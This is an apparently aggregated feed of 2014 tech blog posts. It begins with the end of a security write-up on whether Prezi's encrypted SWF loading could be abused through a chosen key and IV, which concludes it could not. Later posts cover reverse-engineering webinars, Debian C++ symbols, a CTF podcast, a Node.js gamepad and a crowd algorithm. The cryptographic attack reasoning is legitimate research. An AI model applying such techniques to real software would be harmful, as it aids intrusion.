  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroy. This can be bypassed by choosing such an IV, that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and opensource SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we've run into some serious technical problems during the webinar (who would suspect a hangouts outage, huh), which caused both a 40 minute delay, changing the platform and some minor problems on the line (like lack of recording). So, as promised, I did record the talk again and I've just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one, or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Everyone that had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbols leakage. By default the GNU ELF linker exports everything as it goes, leading to maintenance hell. Sadly, this has to be dealt with on the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* Few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Time (other places):
Duration: TBD, but something between 45-60 minutes + time for questions

Video stream: or
Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work

garage4hackers ranchoddas sersier poster

Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language and it seems I finally got around to try and record something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineer and programming related topic, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game and I wanted to use my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with limited hardware related skills that would be a little bit difficult. The next best thing - to use an touch capable device. But it turned out quite quickly that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that and my level of expertise in that area was the same as the level in hardware bulding mumbo-jumbo. My experimental “driver” had two main goals: to run on ubuntu and be build in node.js

The following Post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing, a great starting point. This should give you some idea how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production ready solution, but only an experiment, so keep in mind that there are many bugs, and that there is a high posibility that it will not run on your system (I’ve created it and tested only on Ubuntu 13.10)

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities, which were moving towards a common target. Everything was alright until those entities were close to the target and each other - every entity was placed at the target at the same point. I've tried to implement some collision detection for every entity, so if one entity detected that it is colliding with another one, it would stop moving and wait for the second entity to go away. But, when there would be multiple entities in close proximity - then almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every enitity, instead of stoping and waiting, should apply a revese force which would depend on the proximity to a near entity. That approach is the opposite effect to gravity - antigravity.

The result of this algorithm can be seen above, with some presets for particle behaviors from a "crowd", "jelly" to "bacteria". Such a simple solution can create a great range of posibilities. Of course this is not near a full blown crowd simulation with advanced agent AI, but for my small project, the antigravity did a great job.